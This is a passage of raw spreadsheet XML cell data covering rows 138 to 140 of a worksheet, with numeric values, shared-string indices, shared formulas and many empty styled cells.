      <c r="GU138" s="116">
        <v>12449.0</v>
      </c>
      <c r="GV138" s="116">
        <v>1.0</v>
      </c>
      <c r="GW138" s="116">
        <v>2.0</v>
      </c>
      <c r="GX138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD138" s="174">
        <v>12449.0</v>
      </c>
      <c r="HE138" s="174">
        <v>12449.0</v>
      </c>
      <c r="HF138" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG138" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH138" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI138" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ138" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK138" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL138" s="93">
        <v>87.0</v>
      </c>
      <c r="HM138" s="93">
        <f t="shared" si="83"/>
        <v>2</v>
      </c>
      <c r="HN138" s="93">
        <v>2.0</v>
      </c>
      <c r="HO138" s="93">
        <v>0.0</v>
      </c>
      <c r="HP138" s="93">
        <v>2.0</v>
      </c>
      <c r="HQ138" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR138" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS138" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT138" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU138" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV138" s="119" t="s">
        <v>2332</v>
      </c>
      <c r="HW138" s="119">
        <v>4.0</v>
      </c>
      <c r="HX138" s="119">
        <v>6.0</v>
      </c>
      <c r="HY138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC138" s="120" t="s">
        <v>2333</v>
      </c>
      <c r="ID138" s="120" t="s">
        <v>2333</v>
      </c>
      <c r="IE138" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF138" s="120" t="s">
        <v>2334</v>
      </c>
      <c r="IG138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH138" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II138" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ138" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK138" s="99">
        <v>75.0</v>
      </c>
      <c r="IL138" s="99">
        <v>2.0</v>
      </c>
      <c r="IM138" s="121">
        <f t="shared" si="159"/>
        <v>2</v>
      </c>
      <c r="IN138" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO138" s="98">
        <v>2.0</v>
      </c>
      <c r="IP138" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ138" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR138" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS138" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT138" s="127"/>
      <c r="IU138" s="127"/>
      <c r="IV138" s="127"/>
      <c r="IW138" s="127"/>
      <c r="IX138" s="127"/>
      <c r="IY138" s="127"/>
      <c r="IZ138" s="127"/>
      <c r="JA138" s="127"/>
      <c r="JB138" s="127"/>
      <c r="JC138" s="127"/>
      <c r="JD138" s="127"/>
      <c r="JE138" s="127"/>
      <c r="JF138" s="127"/>
      <c r="JG138" s="127"/>
      <c r="JH138" s="127"/>
      <c r="JI138" s="127"/>
      <c r="JJ138" s="127"/>
      <c r="JK138" s="127"/>
      <c r="JL138" s="127"/>
      <c r="JM138" s="127"/>
      <c r="JN138" s="127"/>
      <c r="JO138" s="127"/>
      <c r="JP138" s="127"/>
      <c r="JQ138" s="127"/>
      <c r="JR138" s="127"/>
      <c r="JS138" s="127"/>
      <c r="JT138" s="127"/>
      <c r="JU138" s="127"/>
      <c r="JV138" s="127"/>
      <c r="JW138" s="127"/>
      <c r="JX138" s="127"/>
      <c r="JY138" s="127"/>
      <c r="JZ138" s="127"/>
      <c r="KA138" s="127"/>
      <c r="KB138" s="127"/>
      <c r="KC138" s="127"/>
      <c r="KD138" s="127"/>
      <c r="KE138" s="127"/>
      <c r="KF138" s="127"/>
      <c r="KG138" s="127"/>
      <c r="KH138" s="127"/>
      <c r="KI138" s="127"/>
      <c r="KJ138" s="127"/>
      <c r="KK138" s="127"/>
      <c r="KL138" s="127"/>
      <c r="KM138" s="127"/>
      <c r="KN138" s="127"/>
      <c r="KO138" s="127"/>
      <c r="KP138" s="127"/>
      <c r="KQ138" s="127"/>
      <c r="KR138" s="127"/>
      <c r="KS138" s="127"/>
      <c r="KT138" s="127"/>
      <c r="KU138" s="127"/>
      <c r="KV138" s="127"/>
      <c r="KW138" s="127"/>
      <c r="KX138" s="127"/>
      <c r="KY138" s="127"/>
      <c r="KZ138" s="127"/>
      <c r="LA138" s="127"/>
      <c r="LB138" s="127"/>
      <c r="LC138" s="127"/>
      <c r="LD138" s="127"/>
      <c r="LE138" s="127"/>
      <c r="LF138" s="127"/>
      <c r="LG138" s="127"/>
      <c r="LH138" s="127"/>
      <c r="LI138" s="127"/>
      <c r="LJ138" s="127"/>
      <c r="LK138" s="127"/>
      <c r="LL138" s="127"/>
      <c r="LM138" s="127"/>
      <c r="LN138" s="127"/>
      <c r="LO138" s="127"/>
      <c r="LP138" s="127"/>
      <c r="LQ138" s="127"/>
      <c r="LR138" s="127"/>
      <c r="LS138" s="127"/>
      <c r="LT138" s="127"/>
      <c r="LU138" s="127"/>
      <c r="LV138" s="127"/>
      <c r="LW138" s="127"/>
      <c r="LX138" s="127"/>
      <c r="LY138" s="127"/>
      <c r="LZ138" s="127"/>
      <c r="MA138" s="127"/>
      <c r="MB138" s="127"/>
      <c r="MC138" s="127"/>
      <c r="MD138" s="127"/>
      <c r="ME138" s="127"/>
      <c r="MF138" s="127"/>
      <c r="MG138" s="127"/>
      <c r="MH138" s="127"/>
      <c r="MI138" s="127"/>
      <c r="MJ138" s="127"/>
      <c r="MK138" s="127"/>
      <c r="ML138" s="127"/>
      <c r="MM138" s="127"/>
      <c r="MN138" s="127"/>
      <c r="MO138" s="127"/>
      <c r="MP138" s="127"/>
      <c r="MQ138" s="127"/>
      <c r="MR138" s="127"/>
      <c r="MS138" s="127"/>
      <c r="MT138" s="127"/>
      <c r="MU138" s="127"/>
      <c r="MV138" s="127"/>
      <c r="MW138" s="127"/>
      <c r="MX138" s="127"/>
      <c r="MY138" s="127"/>
      <c r="MZ138" s="127"/>
      <c r="NA138" s="127"/>
      <c r="NB138" s="127"/>
      <c r="NC138" s="127"/>
      <c r="ND138" s="127"/>
      <c r="NE138" s="127"/>
      <c r="NF138" s="127"/>
      <c r="NG138" s="127"/>
      <c r="NH138" s="127"/>
      <c r="NI138" s="127"/>
      <c r="NJ138" s="127"/>
      <c r="NK138" s="127"/>
      <c r="NL138" s="127"/>
      <c r="NM138" s="127"/>
      <c r="NN138" s="127"/>
      <c r="NO138" s="127"/>
      <c r="NP138" s="127"/>
      <c r="NQ138" s="127"/>
      <c r="NR138" s="127"/>
      <c r="NS138" s="127"/>
      <c r="NT138" s="127"/>
      <c r="NU138" s="127"/>
      <c r="NV138" s="127"/>
      <c r="NW138" s="127"/>
      <c r="NX138" s="127"/>
      <c r="NY138" s="127"/>
    </row>
    <row r="139" ht="153.75" customHeight="1">
      <c r="A139" s="173"/>
      <c r="B139" s="175" t="s">
        <v>209</v>
      </c>
      <c r="C139" s="176" t="s">
        <v>12</v>
      </c>
      <c r="D139" s="176" t="s">
        <v>210</v>
      </c>
      <c r="E139" s="176" t="s">
        <v>2335</v>
      </c>
      <c r="F139" s="176" t="s">
        <v>2336</v>
      </c>
      <c r="G139" s="176" t="s">
        <v>12</v>
      </c>
      <c r="H139" s="176" t="s">
        <v>12</v>
      </c>
      <c r="I139" s="177" t="s">
        <v>2337</v>
      </c>
      <c r="J139" s="177" t="s">
        <v>2338</v>
      </c>
      <c r="K139" s="177" t="s">
        <v>2339</v>
      </c>
      <c r="L139" s="178" t="s">
        <v>375</v>
      </c>
      <c r="M139" s="178">
        <v>12.0</v>
      </c>
      <c r="N139" s="178">
        <v>1.0</v>
      </c>
      <c r="O139" s="93">
        <v>1.0</v>
      </c>
      <c r="P139" s="178">
        <v>1.0</v>
      </c>
      <c r="Q139" s="178">
        <f t="shared" si="204"/>
        <v>2</v>
      </c>
      <c r="R139" s="178">
        <v>1.0</v>
      </c>
      <c r="S139" s="178">
        <v>1.0</v>
      </c>
      <c r="T139" s="94" t="s">
        <v>1962</v>
      </c>
      <c r="U139" s="179" t="s">
        <v>401</v>
      </c>
      <c r="V139" s="180" t="s">
        <v>2340</v>
      </c>
      <c r="W139" s="180" t="s">
        <v>2341</v>
      </c>
      <c r="X139" s="181" t="s">
        <v>2342</v>
      </c>
      <c r="Y139" s="181" t="s">
        <v>2343</v>
      </c>
      <c r="Z139" s="182" t="s">
        <v>2344</v>
      </c>
      <c r="AA139" s="183" t="s">
        <v>13</v>
      </c>
      <c r="AB139" s="183" t="s">
        <v>224</v>
      </c>
      <c r="AC139" s="183" t="s">
        <v>225</v>
      </c>
      <c r="AD139" s="183" t="s">
        <v>13</v>
      </c>
      <c r="AE139" s="183" t="s">
        <v>225</v>
      </c>
      <c r="AF139" s="183" t="s">
        <v>13</v>
      </c>
      <c r="AG139" s="184" t="s">
        <v>226</v>
      </c>
      <c r="AH139" s="185" t="s">
        <v>2345</v>
      </c>
      <c r="AI139" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ139" s="186" t="s">
        <v>13</v>
      </c>
      <c r="AK139" s="187">
        <v>1917.0</v>
      </c>
      <c r="AL139" s="187">
        <v>1.0</v>
      </c>
      <c r="AM139" s="187">
        <v>4.0</v>
      </c>
      <c r="AN139" s="188" t="s">
        <v>12</v>
      </c>
      <c r="AO139" s="187">
        <v>1917.0</v>
      </c>
      <c r="AP139" s="187">
        <v>1.0</v>
      </c>
      <c r="AQ139" s="187">
        <v>4.0</v>
      </c>
      <c r="AR139" s="187">
        <v>1917.0</v>
      </c>
      <c r="AS139" s="187" t="s">
        <v>12</v>
      </c>
      <c r="AT139" s="187">
        <f t="shared" si="227"/>
        <v>1917</v>
      </c>
      <c r="AU139" s="187" t="s">
        <v>12</v>
      </c>
      <c r="AV139" s="187">
        <v>1917.0</v>
      </c>
      <c r="AW139" s="187" t="s">
        <v>12</v>
      </c>
      <c r="AX139" s="187" t="s">
        <v>12</v>
      </c>
      <c r="AY139" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ139" s="100">
        <v>0.0</v>
      </c>
      <c r="BA139" s="189">
        <v>12.0</v>
      </c>
      <c r="BB139" s="189">
        <v>1.0</v>
      </c>
      <c r="BC139" s="189">
        <v>4.0</v>
      </c>
      <c r="BD139" s="189">
        <v>4.0</v>
      </c>
      <c r="BE139" s="189">
        <v>0.0</v>
      </c>
      <c r="BF139" s="189">
        <v>0.0</v>
      </c>
      <c r="BG139" s="189">
        <v>0.0</v>
      </c>
      <c r="BH139" s="189">
        <v>0.0</v>
      </c>
      <c r="BI139" s="189">
        <v>1.0</v>
      </c>
      <c r="BJ139" s="189">
        <v>4.0</v>
      </c>
      <c r="BK139" s="189">
        <v>4.0</v>
      </c>
      <c r="BL139" s="190">
        <f t="shared" si="167"/>
        <v>1</v>
      </c>
      <c r="BM139" s="190">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="BN139" s="190">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO139" s="190">
        <f t="shared" si="170"/>
        <v>4</v>
      </c>
      <c r="BP139" s="190">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="BQ139" s="190">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR139" s="190">
        <f t="shared" si="173"/>
        <v>4</v>
      </c>
      <c r="BS139" s="190">
        <f t="shared" si="174"/>
        <v>4</v>
      </c>
      <c r="BT139" s="190">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU139" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV139" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW139" s="191">
        <v>1917.0</v>
      </c>
      <c r="BX139" s="191">
        <v>1.0</v>
      </c>
      <c r="BY139" s="191">
        <v>4.0</v>
      </c>
      <c r="BZ139" s="188" t="s">
        <v>12</v>
      </c>
      <c r="CA139" s="191">
        <v>1917.0</v>
      </c>
      <c r="CB139" s="191">
        <v>1.0</v>
      </c>
      <c r="CC139" s="191">
        <v>4.0</v>
      </c>
      <c r="CD139" s="191">
        <v>1917.0</v>
      </c>
      <c r="CE139" s="191" t="s">
        <v>12</v>
      </c>
      <c r="CF139" s="191">
        <f t="shared" si="215"/>
        <v>1917</v>
      </c>
      <c r="CG139" s="191" t="s">
        <v>12</v>
      </c>
      <c r="CH139" s="191">
        <v>1917.0</v>
      </c>
      <c r="CI139" s="191" t="s">
        <v>12</v>
      </c>
      <c r="CJ139" s="191" t="s">
        <v>12</v>
      </c>
      <c r="CK139" s="104">
        <v>0.0</v>
      </c>
      <c r="CL139" s="104">
        <v>0.0</v>
      </c>
      <c r="CM139" s="141">
        <v>12.0</v>
      </c>
      <c r="CN139" s="141">
        <v>1.0</v>
      </c>
      <c r="CO139" s="141">
        <v>4.0</v>
      </c>
      <c r="CP139" s="141">
        <v>0.0</v>
      </c>
      <c r="CQ139" s="141">
        <v>4.0</v>
      </c>
      <c r="CR139" s="141">
        <v>4.0</v>
      </c>
      <c r="CS139" s="141">
        <v>0.0</v>
      </c>
      <c r="CT139" s="141">
        <v>0.0</v>
      </c>
      <c r="CU139" s="141">
        <v>0.0</v>
      </c>
      <c r="CV139" s="141">
        <v>0.0</v>
      </c>
      <c r="CW139" s="141">
        <v>1.0</v>
      </c>
      <c r="CX139" s="141">
        <v>4.0</v>
      </c>
      <c r="CY139" s="141">
        <v>0.0</v>
      </c>
      <c r="CZ139" s="141">
        <v>4.0</v>
      </c>
      <c r="DA139" s="141">
        <v>4.0</v>
      </c>
      <c r="DB139" s="107">
        <f t="shared" si="176"/>
        <v>1</v>
      </c>
      <c r="DC139" s="107">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="DD139" s="107">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE139" s="107">
        <f t="shared" si="179"/>
        <v>4</v>
      </c>
      <c r="DF139" s="107">
        <f t="shared" si="180"/>
        <v>4</v>
      </c>
      <c r="DG139" s="107">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH139" s="107">
        <f t="shared" si="181"/>
        <v>4</v>
      </c>
      <c r="DI139" s="107">
        <f t="shared" si="182"/>
        <v>4</v>
      </c>
      <c r="DJ139" s="107">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK139" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL139" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM139" s="192" t="s">
        <v>1023</v>
      </c>
      <c r="DN139" s="192">
        <v>2.0</v>
      </c>
      <c r="DO139" s="192">
        <v>159.0</v>
      </c>
      <c r="DP139" s="188" t="s">
        <v>12</v>
      </c>
      <c r="DQ139" s="192" t="s">
        <v>1023</v>
      </c>
      <c r="DR139" s="108">
        <v>2.0</v>
      </c>
      <c r="DS139" s="108">
        <v>159.0</v>
      </c>
      <c r="DT139" s="192" t="s">
        <v>1023</v>
      </c>
      <c r="DU139" s="192" t="s">
        <v>12</v>
      </c>
      <c r="DV139" s="192" t="str">
        <f t="shared" si="221"/>
        <v>1917, 50447</v>
      </c>
      <c r="DW139" s="192" t="s">
        <v>12</v>
      </c>
      <c r="DX139" s="192" t="s">
        <v>1023</v>
      </c>
      <c r="DY139" s="192" t="s">
        <v>12</v>
      </c>
      <c r="DZ139" s="192" t="s">
        <v>12</v>
      </c>
      <c r="EA139" s="108">
        <v>0.0</v>
      </c>
      <c r="EB139" s="108">
        <v>0.0</v>
      </c>
      <c r="EC139" s="193">
        <v>12.0</v>
      </c>
      <c r="ED139" s="193">
        <v>1.0</v>
      </c>
      <c r="EE139" s="193">
        <v>5.0</v>
      </c>
      <c r="EF139" s="193">
        <v>159.0</v>
      </c>
      <c r="EG139" s="193">
        <v>0.0</v>
      </c>
      <c r="EH139" s="193">
        <v>159.0</v>
      </c>
      <c r="EI139" s="193">
        <v>0.0</v>
      </c>
      <c r="EJ139" s="193">
        <v>0.0</v>
      </c>
      <c r="EK139" s="193">
        <v>0.0</v>
      </c>
      <c r="EL139" s="193">
        <v>0.0</v>
      </c>
      <c r="EM139" s="193">
        <v>1.0</v>
      </c>
      <c r="EN139" s="193">
        <v>5.0</v>
      </c>
      <c r="EO139" s="193">
        <v>159.0</v>
      </c>
      <c r="EP139" s="193">
        <v>0.0</v>
      </c>
      <c r="EQ139" s="193">
        <v>159.0</v>
      </c>
      <c r="ER139" s="194">
        <f t="shared" si="184"/>
        <v>1</v>
      </c>
      <c r="ES139" s="194">
        <f t="shared" si="185"/>
        <v>1</v>
      </c>
      <c r="ET139" s="194">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU139" s="194">
        <f t="shared" si="187"/>
        <v>5</v>
      </c>
      <c r="EV139" s="194">
        <f t="shared" si="188"/>
        <v>5</v>
      </c>
      <c r="EW139" s="194">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX139" s="194">
        <f t="shared" si="190"/>
        <v>159</v>
      </c>
      <c r="EY139" s="194">
        <f t="shared" si="191"/>
        <v>159</v>
      </c>
      <c r="EZ139" s="194">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA139" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB139" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC139" s="195" t="s">
        <v>2346</v>
      </c>
      <c r="FD139" s="195">
        <v>5.0</v>
      </c>
      <c r="FE139" s="195">
        <v>169.0</v>
      </c>
      <c r="FF139" s="188" t="s">
        <v>385</v>
      </c>
      <c r="FG139" s="195" t="s">
        <v>1023</v>
      </c>
      <c r="FH139" s="111">
        <v>2.0</v>
      </c>
      <c r="FI139" s="111">
        <v>159.0</v>
      </c>
      <c r="FJ139" s="195" t="s">
        <v>2346</v>
      </c>
      <c r="FK139" s="195" t="s">
        <v>385</v>
      </c>
      <c r="FL139" s="195" t="str">
        <f t="shared" si="216"/>
        <v>2002752, 2002749, 2101917, 1917, 50447</v>
      </c>
      <c r="FM139" s="195" t="s">
        <v>12</v>
      </c>
      <c r="FN139" s="195" t="s">
        <v>2346</v>
      </c>
      <c r="FO139" s="195" t="s">
        <v>12</v>
      </c>
      <c r="FP139" s="195" t="s">
        <v>12</v>
      </c>
      <c r="FQ139" s="111">
        <v>0.0</v>
      </c>
      <c r="FR139" s="111">
        <v>0.0</v>
      </c>
      <c r="FS139" s="170">
        <v>12.0</v>
      </c>
      <c r="FT139" s="170">
        <v>4.0</v>
      </c>
      <c r="FU139" s="170">
        <v>8.0</v>
      </c>
      <c r="FV139" s="170">
        <v>159.0</v>
      </c>
      <c r="FW139" s="170">
        <v>10.0</v>
      </c>
      <c r="FX139" s="170">
        <v>169.0</v>
      </c>
      <c r="FY139" s="170">
        <v>0.0</v>
      </c>
      <c r="FZ139" s="170">
        <v>0.0</v>
      </c>
      <c r="GA139" s="170">
        <v>0.0</v>
      </c>
      <c r="GB139" s="170">
        <v>0.0</v>
      </c>
      <c r="GC139" s="170">
        <v>4.0</v>
      </c>
      <c r="GD139" s="170">
        <v>5.0</v>
      </c>
      <c r="GE139" s="170">
        <v>159.0</v>
      </c>
      <c r="GF139" s="170">
        <v>0.0</v>
      </c>
      <c r="GG139" s="170">
        <v>159.0</v>
      </c>
      <c r="GH139" s="114">
        <f t="shared" si="193"/>
        <v>4</v>
      </c>
      <c r="GI139" s="114">
        <f t="shared" si="194"/>
        <v>4</v>
      </c>
      <c r="GJ139" s="114">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK139" s="114">
        <f t="shared" si="196"/>
        <v>8</v>
      </c>
      <c r="GL139" s="114">
        <f t="shared" si="197"/>
        <v>5</v>
      </c>
      <c r="GM139" s="114">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN139" s="114">
        <f t="shared" si="199"/>
        <v>169</v>
      </c>
      <c r="GO139" s="114">
        <f t="shared" si="200"/>
        <v>159</v>
      </c>
      <c r="GP139" s="114">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ139" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR139" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS139" s="196" t="s">
        <v>13</v>
      </c>
      <c r="GT139" s="197"/>
      <c r="GU139" s="198">
        <v>12449.0</v>
      </c>
      <c r="GV139" s="199">
        <v>1.0</v>
      </c>
      <c r="GW139" s="199">
        <v>8.0</v>
      </c>
      <c r="GX139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="GY139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="GZ139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="HA139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="HB139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="HC139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="HD139" s="174">
        <v>12449.0</v>
      </c>
      <c r="HE139" s="174">
        <v>12449.0</v>
      </c>
      <c r="HF139" s="200" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG139" s="200" t="s">
        <v>12</v>
      </c>
      <c r="HH139" s="199" t="s">
        <v>12</v>
      </c>
      <c r="HI139" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ139" s="178" t="s">
        <v>2347</v>
      </c>
      <c r="HK139" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL139" s="178">
        <v>18.0</v>
      </c>
      <c r="HM139" s="178">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN139" s="178">
        <v>0.0</v>
      </c>
      <c r="HO139" s="178">
        <v>0.0</v>
      </c>
      <c r="HP139" s="178">
        <v>1.0</v>
      </c>
      <c r="HQ139" s="201">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR139" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS139" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT139" s="202" t="s">
        <v>12</v>
      </c>
      <c r="HU139" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV139" s="203" t="s">
        <v>1281</v>
      </c>
      <c r="HW139" s="203">
        <v>2.0</v>
      </c>
      <c r="HX139" s="203">
        <v>9.0</v>
      </c>
      <c r="HY139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="HZ139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="IA139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="IB139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="IC139" s="120">
        <v>14984.0</v>
      </c>
      <c r="ID139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="IE139" s="204">
        <v>9999.0</v>
      </c>
      <c r="IF139" s="204" t="s">
        <v>1281</v>
      </c>
      <c r="IG139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="IH139" s="204" t="s">
        <v>12</v>
      </c>
      <c r="II139" s="185" t="s">
        <v>12</v>
      </c>
      <c r="IJ139" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK139" s="185">
        <v>6.0</v>
      </c>
      <c r="IL139" s="185">
        <v>0.0</v>
      </c>
      <c r="IM139" s="205">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN139" s="206" t="s">
        <v>230</v>
      </c>
      <c r="IO139" s="207">
        <v>0.0</v>
      </c>
      <c r="IP139" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ139" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR139" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS139" s="208" t="s">
        <v>225</v>
      </c>
      <c r="IT139" s="127"/>
      <c r="IU139" s="127"/>
      <c r="IV139" s="127"/>
      <c r="IW139" s="127"/>
      <c r="IX139" s="127"/>
      <c r="IY139" s="127"/>
      <c r="IZ139" s="127"/>
      <c r="JA139" s="127"/>
      <c r="JB139" s="127"/>
      <c r="JC139" s="127"/>
      <c r="JD139" s="127"/>
      <c r="JE139" s="127"/>
      <c r="JF139" s="127"/>
      <c r="JG139" s="127"/>
      <c r="JH139" s="127"/>
      <c r="JI139" s="127"/>
      <c r="JJ139" s="127"/>
      <c r="JK139" s="127"/>
      <c r="JL139" s="127"/>
      <c r="JM139" s="127"/>
      <c r="JN139" s="127"/>
      <c r="JO139" s="127"/>
      <c r="JP139" s="127"/>
      <c r="JQ139" s="127"/>
      <c r="JR139" s="127"/>
      <c r="JS139" s="127"/>
      <c r="JT139" s="127"/>
      <c r="JU139" s="127"/>
      <c r="JV139" s="127"/>
      <c r="JW139" s="127"/>
      <c r="JX139" s="127"/>
      <c r="JY139" s="127"/>
      <c r="JZ139" s="127"/>
      <c r="KA139" s="127"/>
      <c r="KB139" s="127"/>
      <c r="KC139" s="127"/>
      <c r="KD139" s="127"/>
      <c r="KE139" s="127"/>
      <c r="KF139" s="127"/>
      <c r="KG139" s="127"/>
      <c r="KH139" s="127"/>
      <c r="KI139" s="127"/>
      <c r="KJ139" s="127"/>
      <c r="KK139" s="127"/>
      <c r="KL139" s="127"/>
      <c r="KM139" s="127"/>
      <c r="KN139" s="127"/>
      <c r="KO139" s="127"/>
      <c r="KP139" s="127"/>
      <c r="KQ139" s="127"/>
      <c r="KR139" s="127"/>
      <c r="KS139" s="127"/>
      <c r="KT139" s="127"/>
      <c r="KU139" s="127"/>
      <c r="KV139" s="127"/>
      <c r="KW139" s="127"/>
      <c r="KX139" s="127"/>
      <c r="KY139" s="127"/>
      <c r="KZ139" s="127"/>
      <c r="LA139" s="127"/>
      <c r="LB139" s="127"/>
      <c r="LC139" s="127"/>
      <c r="LD139" s="127"/>
      <c r="LE139" s="127"/>
      <c r="LF139" s="127"/>
      <c r="LG139" s="127"/>
      <c r="LH139" s="127"/>
      <c r="LI139" s="127"/>
      <c r="LJ139" s="127"/>
      <c r="LK139" s="127"/>
      <c r="LL139" s="127"/>
      <c r="LM139" s="127"/>
      <c r="LN139" s="127"/>
      <c r="LO139" s="127"/>
      <c r="LP139" s="127"/>
      <c r="LQ139" s="127"/>
      <c r="LR139" s="127"/>
      <c r="LS139" s="127"/>
      <c r="LT139" s="127"/>
      <c r="LU139" s="127"/>
      <c r="LV139" s="127"/>
      <c r="LW139" s="127"/>
      <c r="LX139" s="127"/>
      <c r="LY139" s="127"/>
      <c r="LZ139" s="127"/>
      <c r="MA139" s="127"/>
      <c r="MB139" s="127"/>
      <c r="MC139" s="127"/>
      <c r="MD139" s="127"/>
      <c r="ME139" s="127"/>
      <c r="MF139" s="127"/>
      <c r="MG139" s="127"/>
      <c r="MH139" s="127"/>
      <c r="MI139" s="127"/>
      <c r="MJ139" s="127"/>
      <c r="MK139" s="127"/>
      <c r="ML139" s="127"/>
      <c r="MM139" s="127"/>
      <c r="MN139" s="127"/>
      <c r="MO139" s="127"/>
      <c r="MP139" s="127"/>
      <c r="MQ139" s="127"/>
      <c r="MR139" s="127"/>
      <c r="MS139" s="127"/>
      <c r="MT139" s="127"/>
      <c r="MU139" s="127"/>
      <c r="MV139" s="127"/>
      <c r="MW139" s="127"/>
      <c r="MX139" s="127"/>
      <c r="MY139" s="127"/>
      <c r="MZ139" s="127"/>
      <c r="NA139" s="127"/>
      <c r="NB139" s="127"/>
      <c r="NC139" s="127"/>
      <c r="ND139" s="127"/>
      <c r="NE139" s="127"/>
      <c r="NF139" s="127"/>
      <c r="NG139" s="127"/>
      <c r="NH139" s="127"/>
      <c r="NI139" s="127"/>
      <c r="NJ139" s="127"/>
      <c r="NK139" s="127"/>
      <c r="NL139" s="127"/>
      <c r="NM139" s="127"/>
      <c r="NN139" s="127"/>
      <c r="NO139" s="127"/>
      <c r="NP139" s="127"/>
      <c r="NQ139" s="127"/>
      <c r="NR139" s="127"/>
      <c r="NS139" s="127"/>
      <c r="NT139" s="127"/>
      <c r="NU139" s="127"/>
      <c r="NV139" s="127"/>
      <c r="NW139" s="127"/>
      <c r="NX139" s="127"/>
      <c r="NY139" s="127"/>
    </row>
    <row r="140">
      <c r="BF140" s="209"/>
      <c r="CT140" s="209"/>
      <c r="EC140" s="210"/>
      <c r="ED140" s="210"/>
      <c r="EE140" s="210"/>
      <c r="EF140" s="210"/>
      <c r="EG140" s="210"/>
      <c r="EH140" s="210"/>
      <c r="EI140" s="210"/>
      <c r="EJ140" s="211"/>
      <c r="EK140" s="210"/>
      <c r="EL140" s="210"/>
      <c r="EM140" s="210"/>
      <c r="EN140" s="210"/>
